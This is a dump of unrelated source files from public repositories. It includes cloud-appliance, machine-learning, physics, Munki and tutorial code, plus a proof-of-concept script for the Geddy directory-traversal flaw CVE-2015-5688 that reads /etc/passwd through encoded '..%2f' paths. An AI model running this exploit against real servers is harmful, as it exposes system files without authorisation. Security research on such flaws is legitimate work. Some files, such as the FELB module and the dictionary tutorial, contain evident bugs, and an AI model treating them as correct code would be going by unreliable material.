2020-04-03T09:30:01.000Z
2020-04-03T09:30:01.000Z
import ibmsecurity.utilities.tools import logging logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/services/" requires_modulers = None requires_version = None def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False): """ Creating a server """ change_required = _check_exist(isamAppliance, service_name, address, port=port) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_post("Creating a server", "{0}{1}/servers".format(module_uri, service_name, address), { "active": active, "address": address, "port": port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def delete(isamAppliance, service_name, address, check_mode=False, force=False): """ deletes a server from specified service name """ if force is True or _check_exist(isamAppliance, service_name, address) is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_delete("Deleting a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def get(isamAppliance, service_name, address, check_mode=False, force=False): """ Retrieves server from specified service name """ return ( isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers)) def get_all(isamAppliance, service_name, check_mode=False, force=False): """ Retrieves a list of servers under a specified service """ return isamAppliance.invoke_get("Retrieving servers for a service", "{0}{1}/servers".format(module_uri, 
service_name), requires_version=requires_version, requires_modules=requires_modulers) def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None, check_mode=False, force=False): """ Updating server """ change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure, ssllabel) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_put("Updating a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), { "address": new_address, "active": active, "port": new_port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_modules=requires_modulers, requires_version=requires_version) else: return isamAppliance.create_return_object() def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None): """ idempontency test """ org_obj = get(isamAppliance, service_name, address) if org_obj['data']['address'] != new_address: return True elif org_obj['data']['active'] != active: return True elif org_obj['data']['port'] != new_port: return True elif org_obj['data']['weight'] != weight: return True elif org_obj['data']['secure'] != secure: return True elif org_obj['data']['ssllabel'] != ssllabel: return True else: return False def _check_exist(isamAppliance, service_name, address): """ idempotency test for delete function """ check_obj = {} # Check weather the address with corresponding server exists try: check_obj = get(isamAppliance, service_name, address) except: return False return True def compare(isamAppliance1, isamAppliance2): """ Compare cluster configuration between two appliances """ ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
38.195946
120
0.552096
import ibmsecurity.utilities.tools import logging logger = logging.getLogger(__name__) module_uri = "/isam/felb/configuration/services/" requires_modulers = None requires_version = None def add(isamAppliance, service_name, address, active, port, weight, secure, ssllabel, check_mode=False, force=False): change_required = _check_exist(isamAppliance, service_name, address, port=port) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_post("Creating a server", "{0}{1}/servers".format(module_uri, service_name, address), { "active": active, "address": address, "port": port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def delete(isamAppliance, service_name, address, check_mode=False, force=False): if force is True or _check_exist(isamAppliance, service_name, address) is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_delete("Deleting a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers) else: return isamAppliance.create_return_object() def get(isamAppliance, service_name, address, check_mode=False, force=False): return ( isamAppliance.invoke_get("Retrieving a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), requires_version=requires_version, requires_modules=requires_modulers)) def get_all(isamAppliance, service_name, check_mode=False, force=False): return isamAppliance.invoke_get("Retrieving servers for a service", "{0}{1}/servers".format(module_uri, service_name), requires_version=requires_version, requires_modules=requires_modulers) def update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, 
ssllabel=None, check_mode=False, force=False): change_required = _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure, ssllabel) if force is True or change_required is True: if check_mode is True: return isamAppliance.create_return_object(changed=True) else: return isamAppliance.invoke_put("Updating a server", "{0}{1}/servers/{2}".format(module_uri, service_name, address), { "address": new_address, "active": active, "port": new_port, "weight": weight, "secure": secure, "ssllabel": ssllabel }, requires_modules=requires_modulers, requires_version=requires_version) else: return isamAppliance.create_return_object() def _check_update(isamAppliance, service_name, address, active, new_address, new_port, weight, secure=False, ssllabel=None): org_obj = get(isamAppliance, service_name, address) if org_obj['data']['address'] != new_address: return True elif org_obj['data']['active'] != active: return True elif org_obj['data']['port'] != new_port: return True elif org_obj['data']['weight'] != weight: return True elif org_obj['data']['secure'] != secure: return True elif org_obj['data']['ssllabel'] != ssllabel: return True else: return False def _check_exist(isamAppliance, service_name, address): check_obj = {} try: check_obj = get(isamAppliance, service_name, address) except: return False return True def compare(isamAppliance1, isamAppliance2): ret_obj1 = get(isamAppliance1) ret_obj2 = get(isamAppliance2) return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
true
true
f705c13bef4357c4b974d68a76c4f8617f700d7c
1,417
py
Python
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
1
2019-10-10T06:15:42.000Z
2019-10-10T06:15:42.000Z
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
null
null
null
tensorflow_probability/python/version.py
bolcom/probability
4a11efad1ecd8a1336e4c9fdb0105efbf2375ad7
[ "Apache-2.0" ]
1
2020-05-27T19:42:06.000Z
2020-05-27T19:42:06.000Z
# Copyright 2018 The TensorFlow Probability Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Define TensorFlow Probability version information.""" # We follow Semantic Versioning (https://semver.org/) _MAJOR_VERSION = '0' _MINOR_VERSION = '9' _PATCH_VERSION = '0' # When building releases, we can update this value on the release branch to # reflect the current release candidate ('rc0', 'rc1') or, finally, the official # stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a # release branch, the current version is by default assumed to be a # 'development' version, labeled 'dev'. _VERSION_SUFFIX = 'dev' # Example, '0.4.0-dev' __version__ = '.'.join([ _MAJOR_VERSION, _MINOR_VERSION, _PATCH_VERSION, ]) if _VERSION_SUFFIX: __version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
38.297297
80
0.703599
_MAJOR_VERSION = '0' _MINOR_VERSION = '9' _PATCH_VERSION = '0' _VERSION_SUFFIX = 'dev' __version__ = '.'.join([ _MAJOR_VERSION, _MINOR_VERSION, _PATCH_VERSION, ]) if _VERSION_SUFFIX: __version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
true
true
f705c143029f1b8fb5a082a334e82961e60babb9
3,371
py
Python
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
model_zoo/mnist/mnist_functional_api.py
zuston/elasticdl
601609fd44f826a2f5ea209443124b2c9a2f9ccb
[ "MIT" ]
null
null
null
# Copyright 2020 The ElasticDL Authors. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np import PIL.Image import tensorflow as tf from elasticdl.python.common.constants import Mode def custom_model(): inputs = tf.keras.Input(shape=(28, 28), name="image") x = tf.keras.layers.Reshape((28, 28, 1))(inputs) x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.BatchNormalization()(x) x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x) x = tf.keras.layers.Dropout(0.25)(x) x = tf.keras.layers.Flatten()(x) outputs = tf.keras.layers.Dense(10)(x) return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model") def prepare_data_for_a_single_file(file_object, filename): """ :param filename: training data file name :param file_object: a file object associated with filename """ label = int(filename.split("/")[-2]) image = PIL.Image.open(file_object) numpy_image = np.array(image) example_dict = { "image": tf.train.Feature( float_list=tf.train.FloatList(value=numpy_image.flatten()) ), "label": tf.train.Feature( int64_list=tf.train.Int64List(value=[label]) ), } example = tf.train.Example( features=tf.train.Features(feature=example_dict) ) return example.SerializeToString() def loss(labels, predictions): labels = tf.reshape(labels, [-1]) return tf.reduce_mean( input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits( logits=predictions, 
labels=labels ) ) def optimizer(lr=0.01): return tf.optimizers.SGD(lr) def feed(dataset, mode, _): def _parse_data(record): if mode == Mode.PREDICTION: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32) } else: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32), "label": tf.io.FixedLenFeature([1], tf.int64), } r = tf.io.parse_single_example(record, feature_description) features = { "image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0) } if mode == Mode.PREDICTION: return features else: return features, tf.cast(r["label"], tf.int32) dataset = dataset.map(_parse_data) if mode == Mode.TRAINING: dataset = dataset.shuffle(buffer_size=1024) return dataset def eval_metrics_fn(): return { "accuracy": lambda labels, predictions: tf.equal( tf.argmax(predictions, 1, output_type=tf.int32), tf.cast(tf.reshape(labels, [-1]), tf.int32), ) }
32.413462
77
0.644616
import numpy as np import PIL.Image import tensorflow as tf from elasticdl.python.common.constants import Mode def custom_model(): inputs = tf.keras.Input(shape=(28, 28), name="image") x = tf.keras.layers.Reshape((28, 28, 1))(inputs) x = tf.keras.layers.Conv2D(32, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.Conv2D(64, kernel_size=(3, 3), activation="relu")(x) x = tf.keras.layers.BatchNormalization()(x) x = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))(x) x = tf.keras.layers.Dropout(0.25)(x) x = tf.keras.layers.Flatten()(x) outputs = tf.keras.layers.Dense(10)(x) return tf.keras.Model(inputs=inputs, outputs=outputs, name="mnist_model") def prepare_data_for_a_single_file(file_object, filename): label = int(filename.split("/")[-2]) image = PIL.Image.open(file_object) numpy_image = np.array(image) example_dict = { "image": tf.train.Feature( float_list=tf.train.FloatList(value=numpy_image.flatten()) ), "label": tf.train.Feature( int64_list=tf.train.Int64List(value=[label]) ), } example = tf.train.Example( features=tf.train.Features(feature=example_dict) ) return example.SerializeToString() def loss(labels, predictions): labels = tf.reshape(labels, [-1]) return tf.reduce_mean( input_tensor=tf.nn.sparse_softmax_cross_entropy_with_logits( logits=predictions, labels=labels ) ) def optimizer(lr=0.01): return tf.optimizers.SGD(lr) def feed(dataset, mode, _): def _parse_data(record): if mode == Mode.PREDICTION: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32) } else: feature_description = { "image": tf.io.FixedLenFeature([28, 28], tf.float32), "label": tf.io.FixedLenFeature([1], tf.int64), } r = tf.io.parse_single_example(record, feature_description) features = { "image": tf.math.divide(tf.cast(r["image"], tf.float32), 255.0) } if mode == Mode.PREDICTION: return features else: return features, tf.cast(r["label"], tf.int32) dataset = dataset.map(_parse_data) if mode == Mode.TRAINING: dataset = dataset.shuffle(buffer_size=1024) 
return dataset def eval_metrics_fn(): return { "accuracy": lambda labels, predictions: tf.equal( tf.argmax(predictions, 1, output_type=tf.int32), tf.cast(tf.reshape(labels, [-1]), tf.int32), ) }
true
true
f705c37d2339c79f6a9a632cefaf65a79808d37d
1,720
py
Python
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
421
2021-12-07T08:46:40.000Z
2022-03-31T12:42:16.000Z
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
5
2022-03-27T07:37:32.000Z
2022-03-31T13:56:11.000Z
2015/CVE-2015-5688/poc/pocsploit/CVE-2015-5688.py
hjyuan/reapoc
ef515e56c44c2590ff8601582bf6c08e076e7083
[ "Apache-2.0" ]
144
2021-12-07T11:06:14.000Z
2022-03-31T07:41:35.000Z
import requests # Vuln Base Info def info(): return { "author": "cckuailong", "name": '''Geddy before v13.0.8 LFI''', "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', "severity": "high", "references": [ "https://nodesecurity.io/advisories/geddy-directory-traversal", "https://github.com/geddy/geddy/issues/697" ], "classification": { "cvss-metrics": "", "cvss-score": "", "cve-id": "", "cwe-id": "" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2015", "geddy", "lfi"], } # Vender Fingerprint def fingerprint(url): return True # Proof of Concept def poc(url): result = {} try: url = format_url(url) path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) if resp.status_code == 200 and "root:" in resp.text: result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result # Exploit, can be same with poc() def exp(url): return poc(url) # Utils def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url
26.875
239
0.533721
import requests def info(): return { "author": "cckuailong", "name": '''Geddy before v13.0.8 LFI''', "description": '''Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.''', "severity": "high", "references": [ "https://nodesecurity.io/advisories/geddy-directory-traversal", "https://github.com/geddy/geddy/issues/697" ], "classification": { "cvss-metrics": "", "cvss-score": "", "cve-id": "", "cwe-id": "" }, "metadata":{ "vuln-target": "", }, "tags": ["cve", "cve2015", "geddy", "lfi"], } def fingerprint(url): return True def poc(url): result = {} try: url = format_url(url) path = '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd' resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) if resp.status_code == 200 and "root:" in resp.text: result["success"] = True result["info"] = info() result["payload"] = url+path except: result["success"] = False return result def exp(url): return poc(url) def format_url(url): url = url.strip() if not ( url.startswith('http://') or url.startswith('https://') ): url = 'http://' + url url = url.rstrip('/') return url
true
true
f705c380c38b745a99107f2f972df3893011b4c5
64
py
Python
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
Factorial digit sum/main.py
Skogrine/ProjectEuler
40e104ac91852dec66b5b7938d6553d1bbdc590f
[ "Apache-2.0" ]
null
null
null
import math n = 100 print(sum(map(int, str(math.factorial(n)))))
21.333333
44
0.703125
import math n = 100 print(sum(map(int, str(math.factorial(n)))))
true
true
f705c4e287fb6d6f6989f47abb2afa301f8bd782
2,415
py
Python
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
blend.py
andrewdownie/BlendAway
daf73b22c29dfa905fbe8e838188d4df5861ae5d
[ "MIT" ]
null
null
null
import os import sys import numpy as np import cv2 import statistics import datetime def getMedian(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.median_grouped(values) def getMean(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.mean(values) def getMode(arr, x, y): values = [] for a in arr: values.append(a[x][y]) try: mode = statistics.mode(values) return mode except statistics.StatisticsError: # all values are the same return getMedian(arr,x,y) method = sys.argv[1] imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] # image #direct = os.getcwd() + "/images/" # where to get test images #saved = os.getcwd() + "/saved/" # where to get test images direct = "/var/www/html/" # where to get test images saved = "/var/www/html/" # where to get test images i=0 images = [] for img in imgs: image = cv2.imread(direct + img) # open template image images.append(image) (height, width) = image.shape[:2] # get dimensions red = [] green = [] blue = [] for image in images: redMatrix = [[0 for x in range(width)] for y in range(height)] greenMatrix = [[0 for x in range(width)] for y in range(height)] blueMatrix = [[0 for x in range(width)] for y in range(height)] for x in range(height): for y in range(width): redMatrix[x][y] = image[x,y,0] greenMatrix[x][y] = image[x,y,1] blueMatrix[x][y] = image[x,y,2] red.append(redMatrix) green.append(greenMatrix) blue.append(blueMatrix) newImage = np.zeros((height,width,3), np.uint8) for x in range(height): for y in range(width): rgb = [] if(method == "median"): redMedian = getMedian(red,x,y) greenMedian = getMedian(green,x,y) blueMedian = getMedian(blue,x,y) if(method == "mean"): redMedian = getMean(red,x,y) greenMedian = getMean(green,x,y) blueMedian = getMean(blue,x,y) if(method == "mode"): redMedian = getMode(red,x,y) greenMedian = getMode(green,x,y) blueMedian = getMode(blue,x,y) rgb.append(redMedian) rgb.append(greenMedian) rgb.append(blueMedian) newImage[x][y] = rgb 
cv2.imwrite(saved + "results.jpg", newImage) # save image
25.15625
68
0.59089
import os import sys import numpy as np import cv2 import statistics import datetime def getMedian(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.median_grouped(values) def getMean(arr, x, y): values = [] for a in arr: values.append(a[x][y]) return statistics.mean(values) def getMode(arr, x, y): values = [] for a in arr: values.append(a[x][y]) try: mode = statistics.mode(values) return mode except statistics.StatisticsError: return getMedian(arr,x,y) method = sys.argv[1] imgs = ["1.png","2.png", "3.png", "4.png", "5.png"] " i=0 images = [] for img in imgs: image = cv2.imread(direct + img) images.append(image) (height, width) = image.shape[:2] red = [] green = [] blue = [] for image in images: redMatrix = [[0 for x in range(width)] for y in range(height)] greenMatrix = [[0 for x in range(width)] for y in range(height)] blueMatrix = [[0 for x in range(width)] for y in range(height)] for x in range(height): for y in range(width): redMatrix[x][y] = image[x,y,0] greenMatrix[x][y] = image[x,y,1] blueMatrix[x][y] = image[x,y,2] red.append(redMatrix) green.append(greenMatrix) blue.append(blueMatrix) newImage = np.zeros((height,width,3), np.uint8) for x in range(height): for y in range(width): rgb = [] if(method == "median"): redMedian = getMedian(red,x,y) greenMedian = getMedian(green,x,y) blueMedian = getMedian(blue,x,y) if(method == "mean"): redMedian = getMean(red,x,y) greenMedian = getMean(green,x,y) blueMedian = getMean(blue,x,y) if(method == "mode"): redMedian = getMode(red,x,y) greenMedian = getMode(green,x,y) blueMedian = getMode(blue,x,y) rgb.append(redMedian) rgb.append(greenMedian) rgb.append(blueMedian) newImage[x][y] = rgb cv2.imwrite(saved + "results.jpg", newImage)
true
true
f705c4fc494cdf40b01b01fb964de724d9ee0942
1,205
py
Python
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
AccessKeysInDictionary.py
Snehasis124/PythonTutorials
133060cd4f2126dbc427a724b831834e90c26fdc
[ "Apache-2.0" ]
null
null
null
#9TH PROGRAM # THIS PROGRAM WILL HELP IN ACCESSING DICTIONARY ITEMS AND PERFROM CERTAIN OPERATIONS WITH DICTIONARY ages = {} #EMPTY DICTIONARY ages["Micky"] = 24 ages["Lucky"] = 25 print(ages) keys = ages.keys # .keys prints all the keys avaialble in Dictionary print(keys) values = ages.values # .values prints all the values avaialble in Dictionary print(values) print(sorted(ages)) # NOTE Unable to sort print(sorted(ages.values)) print(ages.values) # Prints the values # NOTE has_key() has been replaced by "in" in Python 3 , You can access like below. # Syntax : "Values" in "dict" if("Micky" in ages): print("Micky is there") else: print("Micky is not there") print(len(ages)) # Print the length of the dictionary #Adding new item # New initialization ages = {"Snehasis" : "24" , "Sradhasis" : 25} print(ages) # New members ages["LKP"] = 45 # Here value is saved as int if("LKP" in ages): updatedValue = ages.get("LKP") + 10 print("Updated Value = " , updatedValue) print(ages) ages["JYOTI"] = "38" # Here value is saved as string if("JYOTI" in ages): updatedValue = ages.get("JYOTI") + " New Age" print("Updated Value = " , updatedValue) print(ages)
23.173077
101
0.687137
ages = {} ages["Micky"] = 24 ages["Lucky"] = 25 print(ages) keys = ages.keys print(keys) values = ages.values print(values) print(sorted(ages)) print(ages.values) if("Micky" in ages): print("Micky is there") else: print("Micky is not there") print(len(ages)) ages = {"Snehasis" : "24" , "Sradhasis" : 25} print(ages) ages["LKP"] = 45 if("LKP" in ages): updatedValue = ages.get("LKP") + 10 print("Updated Value = " , updatedValue) print(ages) ages["JYOTI"] = "38" if("JYOTI" in ages): updatedValue = ages.get("JYOTI") + " New Age" print("Updated Value = " , updatedValue) print(ages)
true
true
f705c51665ca83673376bc29d03db188df991c5f
2,970
py
Python
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
852
2015-01-11T21:03:51.000Z
2022-03-25T21:14:00.000Z
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
30,371
2015-01-02T00:14:40.000Z
2022-03-31T23:26:05.000Z
PhysicsTools/Heppy/python/analyzers/core/SkimAnalyzerCount.py
ckamtsikis/cmssw
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
[ "Apache-2.0" ]
3,240
2015-01-02T05:53:18.000Z
2022-03-31T17:24:21.000Z
from __future__ import print_function import itertools from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle from PhysicsTools.HeppyCore.framework.event import Event from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters from DataFormats.FWLite import Events, Handle,Lumis class SkimAnalyzerCount( Analyzer ): #--------------------------------------------- # TO FINDS THE INITIAL EVENTS BEFORE THE SKIM #--------------------------------------------- def __init__(self, cfg_ana, cfg_comp, looperName): super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName) self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False self.verbose = getattr(self.cfg_ana, 'verbose', False) def declareHandles(self): super(SkimAnalyzerCount, self).declareHandles() self.counterHandle = Handle("edm::MergeableCounter") self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' ) def beginLoop(self, setup): super(SkimAnalyzerCount,self).beginLoop(setup) self.counters.addCounter('SkimReport') self.count = self.counters.counter('SkimReport') self.count.register('All Events') if self.cfg_comp.isMC: self.count.register('Sum Weights') if not self.useLumiBlocks: #print 'Will actually count events instead of accessing lumi blocks' return True print('Counting the total events before the skim by accessing luminosity blocks') lumis = Lumis(self.cfg_comp.files) totalEvents=0 for lumi in lumis: if lumi.getByLabel('prePathCounter',self.counterHandle): totalEvents+=self.counterHandle.product().value else: self.useLumiBlocks = False break if self.useLumiBlocks: self.count.inc('All Events',totalEvents) if self.cfg_comp.isMC: self.count.inc('Sum Weights',totalEvents) print('Done -> proceeding with the analysis') else: print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)') def 
process(self, event): if self.verbose: print("\nProcessing run:lumi:event %d:%d:%d" % ( event.input.eventAuxiliary().id().run(), event.input.eventAuxiliary().id().luminosityBlock(), event.input.eventAuxiliary().id().event())) if not self.useLumiBlocks: self.readCollections( event.input ) self.count.inc('All Events') if self.cfg_comp.isMC: self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight()) return True
40.684932
121
0.619865
from __future__ import print_function import itertools from PhysicsTools.Heppy.analyzers.core.Analyzer import Analyzer from PhysicsTools.Heppy.analyzers.core.AutoHandle import AutoHandle from PhysicsTools.HeppyCore.framework.event import Event from PhysicsTools.HeppyCore.statistics.counter import Counter, Counters from DataFormats.FWLite import Events, Handle,Lumis class SkimAnalyzerCount( Analyzer ): def __init__(self, cfg_ana, cfg_comp, looperName): super(SkimAnalyzerCount, self).__init__(cfg_ana, cfg_comp, looperName) self.useLumiBlocks = self.cfg_ana.useLumiBlocks if (hasattr(self.cfg_ana,'useLumiBlocks')) else False self.verbose = getattr(self.cfg_ana, 'verbose', False) def declareHandles(self): super(SkimAnalyzerCount, self).declareHandles() self.counterHandle = Handle("edm::MergeableCounter") self.mchandles['GenInfo'] = AutoHandle( ('generator','',''), 'GenEventInfoProduct' ) def beginLoop(self, setup): super(SkimAnalyzerCount,self).beginLoop(setup) self.counters.addCounter('SkimReport') self.count = self.counters.counter('SkimReport') self.count.register('All Events') if self.cfg_comp.isMC: self.count.register('Sum Weights') if not self.useLumiBlocks: return True print('Counting the total events before the skim by accessing luminosity blocks') lumis = Lumis(self.cfg_comp.files) totalEvents=0 for lumi in lumis: if lumi.getByLabel('prePathCounter',self.counterHandle): totalEvents+=self.counterHandle.product().value else: self.useLumiBlocks = False break if self.useLumiBlocks: self.count.inc('All Events',totalEvents) if self.cfg_comp.isMC: self.count.inc('Sum Weights',totalEvents) print('Done -> proceeding with the analysis') else: print('Failed -> will have to actually count events (this can happen if the input dataset is not a CMG one)') def process(self, event): if self.verbose: print("\nProcessing run:lumi:event %d:%d:%d" % ( event.input.eventAuxiliary().id().run(), event.input.eventAuxiliary().id().luminosityBlock(), 
event.input.eventAuxiliary().id().event())) if not self.useLumiBlocks: self.readCollections( event.input ) self.count.inc('All Events') if self.cfg_comp.isMC: self.count.inc('Sum Weights', self.mchandles['GenInfo'].product().weight()) return True
true
true
f705c5f7c4974cac5efeddeb4787732c80472742
114
py
Python
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
blog/admin.py
EvaZogg/DjangoTranslationWebsite
3946c052547deed216332cb316f48fc70c09ff22
[ "BSD-2-Clause" ]
null
null
null
from django.contrib import admin from .models import blog # Register your models here. admin.site.register(blog)
19
32
0.798246
from django.contrib import admin from .models import blog admin.site.register(blog)
true
true
f705c6c1705b01df89f15b731ab6fc18b82c61cd
6,579
py
Python
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
23
2015-08-04T22:56:55.000Z
2022-02-14T12:41:23.000Z
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
40
2016-01-28T17:29:52.000Z
2021-11-12T04:22:48.000Z
payload/usr/local/sal/checkin_modules/munki_checkin.py
forvitinn/sal-scripts
585934f641732b29c0f0be9072b32606ccc8e96a
[ "Apache-2.0" ]
45
2015-08-04T00:12:28.000Z
2022-02-21T20:06:40.000Z
#!/usr/local/sal/Python.framework/Versions/Current/bin/python3 import datetime import pathlib import plistlib import sys import sal sys.path.insert(0, "/usr/local/munki") from munkilib import munkicommon __version__ = "1.2.0" def main(): # If we haven't successfully submitted to Sal, pull the existing # munki section rather than start from scratch, as we want to # keep any install/removal history that may be there. munki_submission = sal.get_checkin_results().get("munki", {}) munki_report = get_managed_install_report() extras = {} extras["munki_version"] = munki_report["MachineInfo"].get("munki_version") extras["manifest"] = munki_report.get("ManifestName") extras["runtype"] = munki_report.get("RunType", "custom") munki_submission["extra_data"] = extras munki_submission["facts"] = { "checkin_module_version": __version__, "RunType": munki_report["RunType"], "StartTime": munki_report["StartTime"], "EndTime": munki_report["EndTime"], } if munki_report.get("Conditions"): for condition, value in munki_report["Conditions"].items(): # Join lists of strings into a comma-delimited string, as # the server wants just text. try: if hasattr(value, "append"): value = ", ".join(value) except Exception as e: # We god something weird from a condtion that probably wouldn't work anyway continue munki_submission["facts"][condition] = value munki_submission["messages"] = [] for key in ("Errors", "Warnings"): for msg in munki_report[key]: # We need to drop the final 'S' to match Sal's message types. munki_submission["messages"].append( {"message_type": key.upper()[:-1], "text": msg} ) now = datetime.datetime.now().astimezone(datetime.timezone.utc).isoformat() # Process managed items and update histories. 
